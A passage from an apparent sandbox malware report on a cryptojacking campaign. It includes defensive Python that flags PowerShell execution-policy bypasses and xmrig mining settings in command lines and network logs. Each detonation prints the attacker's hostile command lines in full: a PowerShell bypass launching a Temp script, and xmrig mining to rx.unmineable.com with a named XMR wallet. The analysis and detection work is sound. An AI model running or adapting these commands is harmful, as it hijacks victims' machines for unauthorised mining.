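    return {"algo": opts.get("algo"), "pool_host": url.hostname, "pool_port": url.port,
            "tls": url.scheme in {"stratum+ssl", "stratum+tls"}, "coin": coin,
            "wallet": wallet or None, "worker": worker or None, "password": opts.get("pass")}


def powershell_bypass_from_temp(cmdline: str) -> bool:
    """powershell.exe started with an ExecutionPolicy bypass on a script under Temp."""
    tokens = split_cmdline(cmdline)
    if not tokens or not tokens[0].lower().endswith("powershell.exe"):
        return False
    return bool(PS_BYPASS_RE.search(cmdline) and TEMP_DIR_RE.search(cmdline))


def is_script_policy_probe(path: str, md5: str) -> bool:
    """True for the benign __PSScriptPolicyTest_*.ps1 artifact with the body "1".
    Other builds write a different body (behavioral19 records another hash), so a
    miss means only that the body is not the one-byte form, not that it is hostile."""
    name = path.rsplit("\\", 1)[-1]
    return (name.startswith("__PSScriptPolicyTest_") and name.endswith(".ps1")
            and md5.lower() == PROBE_MD5)


def triage(cmdline: str) -> list:
    """Findings for one process-creation event; an empty list means nothing matched."""
    findings = []
    if powershell_bypass_from_temp(cmdline):
        findings.append("powershell: ExecutionPolicy bypass on a script under AppData\\Local\\Temp")
    cfg = miner_config(cmdline)
    if cfg:
        findings.append(f"miner: algo={cfg['algo']} pool={cfg['pool_host']}:{cfg['pool_port']} "
                        f"tls={cfg['tls']} coin={cfg['coin']} worker={cfg['worker']}")
    return findings


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(split_cmdline(line)[0], "->", triage(line) or ["no finding"])
```

The wallet and worker name are the stable part of this campaign: the dropped binary is an unmodified xmrig 6.21.3 release, so hashing the file catches only this version, while the payout address on the command line survives an upgrade of the miner.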
Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 4.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
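The Network table above shows the two things the miner needs from the outside: a download from github.com and objects.githubusercontent.com, consistent with fetching an xmrig release asset from GitHub (the dropped path xmrig-6.21.3\xmrig.exe matches the release archive layout), and then a long-lived TLS session to rx.unmineable.com:443. Because the pool is reached with stratum+ssl on port 443, the flow is indistinguishable from HTTPS at the port level; the usable signals are the DNS query for the pool name (or the TLS SNI) and the process that opened the socket, while the reverse (in-addr.arpa) lookups of addresses already contacted add nothing. The following Python is an added example for this page, not part of the report: it parses rows in the report's own "Country Destination Domain Proto" layout, pairs a pool domain's DNS lookup with the TCP connection that followed it, and summarises the contacted hosts with DNS and reverse lookups dropped. The rows are constructed from the table above plus the domain-less row "US 138.91.171.81:80 tcp" from behavioral13 to exercise the missing-name case; the pool watch-list holds only the domain this report observed and is an assumption.

```python
import re
from collections import defaultdict

# Constructed sample: the behavioral14 Network table above, in the report's own
# "Country Destination Domain Proto" layout, plus the domain-less row
# "US 138.91.171.81:80 tcp" from behavioral13 to exercise the missing-name case.
NETWORK_TABLE = """\
Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 138.91.171.81:80 tcp
"""

# Watch-list of mining-pool names; an assumption, seeded only with the one this report saw.
POOL_DOMAINS = {"rx.unmineable.com"}

ROW_RE = re.compile(r"^(\S+)\s+(\d{1,3}(?:\.\d{1,3}){3}):(\d+)\s+(?:(\S+)\s+)?(udp|tcp)$")


def parse_rows(text: str) -> list:
    """Turn the flattened table into dicts; the Domain column may be empty."""
    flows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Country"):
            continue
        m = ROW_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised row: {line!r}")
        country, ip, port, domain, proto = m.groups()
        flows.append({"country": country, "ip": ip, "port": int(port),
                      "domain": domain, "proto": proto})
    return flows


def is_reverse_lookup(domain) -> bool:
    return bool(domain) and domain.endswith(".in-addr.arpa")


def pool_activity(flows: list) -> list:
    """Pair each pool domain's TCP connection with the DNS lookup that preceded it."""
    findings = []
    for f in flows:
        if f["domain"] in POOL_DOMAINS and f["proto"] == "tcp":
            dns_seen = any(g["domain"] == f["domain"] and g["proto"] == "udp"
                           and g["port"] == 53 for g in flows)
            findings.append({"domain": f["domain"], "ip": f["ip"], "port": f["port"],
                             "dns_seen": dns_seen,
                             # 443 plus stratum+ssl looks like HTTPS at the port level
                             "looks_like_https": f["port"] == 443})
    return findings


def contacted_hosts(flows: list) -> dict:
    """Distinct (ip, port, proto) per name, dropping DNS traffic and reverse lookups."""
    hosts = defaultdict(set)
    for f in flows:
        if f["port"] == 53 or is_reverse_lookup(f["domain"]):
            continue
        hosts[f["domain"] or "(no name)"].add((f["ip"], f["port"], f["proto"]))
    return dict(hosts)


if __name__ == "__main__":
    rows = parse_rows(NETWORK_TABLE)
    for hit in pool_activity(rows):
        print("pool:", hit)
    for name, endpoints in contacted_hosts(rows).items():
        print(name, sorted(endpoints))
```

Blocking the GitHub hosts is not a realistic control, since they serve legitimate software; the pool name and the xmrig.exe process are the parts worth alerting on, and the domain-less 80/tcp row shows why a row without a resolved name must not be silently dropped.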

Files

memory/4400-3-0x00007FFA016F3000-0x00007FFA016F4000-memory.dmp

memory/4400-5-0x000001F250540000-0x000001F250562000-memory.dmp

memory/4400-8-0x00007FFA016F0000-0x00007FFA020DC000-memory.dmp

memory/4400-9-0x000001F250750000-0x000001F2507C6000-memory.dmp

memory/4400-10-0x00007FFA016F0000-0x00007FFA020DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5dediglm.tqo.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4400-25-0x00007FFA016F0000-0x00007FFA020DC000-memory.dmp

memory/4400-61-0x000001F2506E0000-0x000001F2506EA000-memory.dmp

memory/4400-48-0x000001F2506F0000-0x000001F250702000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4684-90-0x000001E4B9080000-0x000001E4B90A0000-memory.dmp

memory/4684-91-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4400-92-0x00007FFA016F3000-0x00007FFA016F4000-memory.dmp

memory/4684-93-0x00007FF743120000-0x00007FF743D53000-memory.dmp

memory/4400-94-0x00007FFA016F0000-0x00007FFA020DC000-memory.dmp

memory/4400-95-0x00007FFA016F0000-0x00007FFA020DC000-memory.dmp

memory/4684-{96..156}-0x00007FF743120000-0x00007FF743D53000-memory.dmp (61 consecutive dumps of the same region)

Analysis: behavioral19

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:11

Platform

win10v2004-20240508-en

Max time kernel

1798s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 hits; the report records no description, indicator, process or target for any of them)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4168,i,13281073920029625837,8253721632651544158,262144 --variations-seed-version --mojo-platform-channel-handle=3984 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4028,i,13281073920029625837,8253721632651544158,262144 --variations-seed-version --mojo-platform-channel-handle=1408 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
BE 2.17.107.105:443 www.bing.com tcp
US 8.8.8.8:53 105.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 92.16.208.104.in-addr.arpa udp

Files

memory/1968-0-0x00007FFE86713000-0x00007FFE86715000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hcqmurmi.szu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1968-10-0x00007FFE86710000-0x00007FFE871D1000-memory.dmp

memory/1968-11-0x000001AF5DB80000-0x000001AF5DBA2000-memory.dmp

memory/1968-12-0x00007FFE86710000-0x00007FFE871D1000-memory.dmp

memory/1968-14-0x00007FFE86710000-0x00007FFE871D1000-memory.dmp

memory/1968-15-0x000001AF5DDB0000-0x000001AF5DDC2000-memory.dmp

memory/1968-16-0x000001AF5DB70000-0x000001AF5DB7A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3980-47-0x0000025B3CB00000-0x0000025B3CB20000-memory.dmp

memory/3980-48-0x0000025B3CB40000-0x0000025B3CB60000-memory.dmp

memory/3980-49-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/1968-50-0x00007FFE86710000-0x00007FFE871D1000-memory.dmp

memory/1968-51-0x00007FFE86713000-0x00007FFE86715000-memory.dmp

memory/3980-53-0x0000025B3CB60000-0x0000025B3CB80000-memory.dmp

memory/3980-52-0x0000025B3CB80000-0x0000025B3CBA0000-memory.dmp

memory/3980-54-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-55-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/1968-56-0x00007FFE86710000-0x00007FFE871D1000-memory.dmp

memory/3980-57-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp

memory/3980-59-0x0000025B3CB60000-0x0000025B3CB80000-memory.dmp

memory/3980-58-0x0000025B3CB80000-0x0000025B3CBA0000-memory.dmp

memory/3980-{60..118}-0x00007FF6149C0000-0x00007FF6155F3000-memory.dmp (59 consecutive dumps of the same region)

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:00

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1805s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 hits; the report records no description, indicator, process or target for any of them)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 23.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 56.94.73.104.in-addr.arpa udp

Files

memory/4324-2-0x00007FF9D8443000-0x00007FF9D8444000-memory.dmp

memory/4324-5-0x000001F3C7440000-0x000001F3C7462000-memory.dmp

memory/4324-8-0x00007FF9D8440000-0x00007FF9D8E2C000-memory.dmp

memory/4324-9-0x000001F3C75F0000-0x000001F3C7666000-memory.dmp

memory/4324-10-0x00007FF9D8440000-0x00007FF9D8E2C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yzvxlyfi.4ow.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4324-25-0x00007FF9D8440000-0x00007FF9D8E2C000-memory.dmp

memory/4324-48-0x000001F3C7790000-0x000001F3C77A2000-memory.dmp

memory/4324-61-0x000001F3C75E0000-0x000001F3C75EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/528-90-0x0000015DC5600000-0x0000015DC5620000-memory.dmp

memory/4324-91-0x00007FF9D8443000-0x00007FF9D8444000-memory.dmp

memory/4324-92-0x00007FF9D8440000-0x00007FF9D8E2C000-memory.dmp

memory/528-93-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/4324-94-0x00007FF9D8440000-0x00007FF9D8E2C000-memory.dmp

memory/528-{95..153}-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp (59 consecutive dumps of the same region)

memory/528-154-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-155-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-156-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:08

Platform

win11-20240508-en

Max time kernel

1793s

Max time network

1783s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.227.11:443 tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vlvtaidh.byh.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3


Analysis: behavioral26

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:13

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1799s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 24.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pphytjkj.w5t.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3


Analysis: behavioral31

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:19

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1780s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
